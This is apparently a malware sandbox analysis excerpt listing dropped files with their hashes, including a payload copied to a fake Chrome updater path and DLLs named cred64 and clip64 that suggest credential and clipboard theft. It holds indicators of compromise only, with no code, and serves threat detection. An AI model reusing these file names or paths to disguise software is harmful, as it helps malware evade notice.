MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 101343244d619fd29dc007b34351865b
SHA1 a721bf0ee99f24b3e6c263033cfa02a63d4175cc
SHA256 286038573287d04ce980461054d2377b71ab4eb8a37e466b38d120ad7f93a043
SHA512 1a40055b9e2186d142059ab12afc82a21767f9fbfe98345be40f67619d128fb261f6afef74b25ba52b8f80480bb86e06006047de1b9505d5a65f7d7ee3ce0209

memory/4432-444-0x00000000012E0000-0x00000000012F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\is-31GRO.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/560-466-0x0000000000400000-0x0000000000513000-memory.dmp

memory/4892-473-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OD5HG.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-31GRO.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/4876-502-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3732-507-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/3252-804-0x00007FF7A9500000-0x00007FF7A9A43000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 787696eec404522d2ee4fc5268d953ed
SHA1 9f0bac6098bde2edf7fee8004d5587e179d3f863
SHA256 ba6b056c813be12d66509f318ab294913f01edb28cf78ad67442cbded496dfc1
SHA512 93d32752aa03d43af7c2d1685208bc4b4c9c40f0c9651d91856e5130a1faef3e51272c71a75e04033fbcf26b37eccf6d3a8ad899578bafd25d79fe1976680b96

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe

MD5 0d88834a56d914983a2fe03d6c8c7a83
SHA1 e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35
SHA256 e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53
SHA512 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/3252-851-0x00007FF7A9500000-0x00007FF7A9A43000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\dbgcore.DLL

MD5 15a2bc75539a13167028a3d2940bf40a
SHA1 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86
SHA256 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693
SHA512 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d

\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

memory/4520-905-0x00007FF7363E0000-0x00007FF736923000-memory.dmp

memory/4640-916-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\63508229815107759479390265

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini

MD5 818d3a4899c5596d8d8da00a87e6d8bb
SHA1 4e0e04f5ca5d81661702877852fd9d059722762f
SHA256 9986830f6e44d24b86936851c2c0cd961ecdddbed3b34e8f6a64693f36e9429d
SHA512 1cd1c882adcee3d89bdc2b07ccf8d4913149565085d42e0f67a4c08b4c4d504b51c9ae44a11de906a1aed202391eb2b3461f63268158b6879cae9a18d56da239